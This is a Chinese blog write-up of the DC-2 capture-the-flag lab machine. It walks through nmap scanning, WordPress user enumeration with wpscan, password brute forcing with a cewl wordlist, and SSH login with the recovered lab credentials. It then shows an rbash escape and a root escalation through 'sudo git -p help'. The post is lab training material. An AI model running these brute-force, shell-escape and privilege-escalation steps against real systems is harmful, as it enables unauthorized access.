tac2664

实验环境

  1. Vmware workstation
  2. kali2020
  3. DC-2
  4. DC-2靶机网卡和kali是一样的
  5. kali 的ip地址:192.168.6.129

主机发现

 第一种方法:使用VMware去查看DC-2靶机的MAC地址;第二种方法:直接进行主机发现。用命令扫描网段存活主机。

nmap -sP 192.168.6.0/24

 

 发现靶机IP地址为:192.168.6.132

信息收集

端口扫描

命令1:nmap -A -T4 -p- 192.168.6.132
命令2:nmap -sV 192.168.6.132

 

 开放了80和7744端口

访问一下,发现无法访问

修改攻击机的hosts文件,将以下内容写入

192.168.6.132 DC-2

 

 

 

 

 发现还是不让我访问,我就修改了Windows下的hosts

 

 

 然后就能访问了

 

 

发现flag1

 

 有关键字cewl,字面意思大概就是要爆破出用户名和密码了

查看指纹信息,知道是wordpressCMS

 

利用wpscan扫一下用户名

wpscan --url http://dc-2/ -e u

 

 将用户名存到文件

使用cewl生成密码

cewl -w pass.txt http://dc-2

 

 

攻击

爆破

wpscan --ignore-main-redirect --url 192.168.6.132 -U users.txt -P pass.txt --force

出来了

 

 后台地址是在首页地址后加wp-login.php

 

用jerry登录发现flag2,tom页面没发现什么

 

 

 

尝试ssh远程登录

我们尝试用tom用户进行登录ssh服务,密码:parturient
用户:jerry,密码:adipiscing
命令:ssh tom@192.168.6.132 -p 7744

 

输入命令,发现受rbash的限

 

 

突破rbash

BASH_CMDS[a]=/bin/sh;a
/bin/bash

 

使用并添加环境变量

export PATH=$PATH:/bin/

 

 他说在Jerry里,那我们切换

 

 有点白痴,居然cd /了

说不是最终的flag,提示git

 

提权

sudo git -p help

!/bin/bash

即可登录root用户

 

 去根目录找

 

 

结束。

 

分类:

技术点:

相关文章:

  • 2021-04-07
  • 2021-09-27
  • 2021-12-18
  • 2021-07-22
  • 2021-07-26
  • 2021-07-23
  • 2022-03-08
  • 2021-10-07
猜你喜欢
  • 2022-03-07
  • 2021-07-28
  • 2021-04-05
  • 2022-01-23
  • 2021-05-17
  • 2021-04-19
相关资源
相似解决方案